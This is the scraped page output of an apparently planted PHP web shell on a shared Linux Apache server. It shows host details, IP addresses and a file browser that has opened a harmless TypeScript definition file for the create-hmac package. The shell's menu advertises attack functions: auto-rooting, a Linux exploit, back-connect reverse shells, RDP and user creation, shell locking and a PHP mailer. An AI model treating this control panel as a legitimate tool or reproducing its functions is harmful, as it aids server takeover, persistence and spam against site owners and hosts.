Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
create-hmac /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
656
B
-rw-r--r--
package.json
698
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for create-hmac 1.1 // Project: https://github.com/crypto-browserify/createHmac // Definitions by: BendingBender <https://github.com/BendingBender> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped // TypeScript Version: 2.1 /// <reference types="node" /> import { Hmac } from 'crypto'; export = createHmac; declare function createHmac(algo: createHmac.Algorithm, key: string | Buffer): Hmac; declare namespace createHmac { type Algorithm = | 'rmd160' | 'ripemd160' | 'md5' | 'sha' | 'sha1' | 'sha224' | 'sha256' | 'sha384' | 'sha512'; }
Close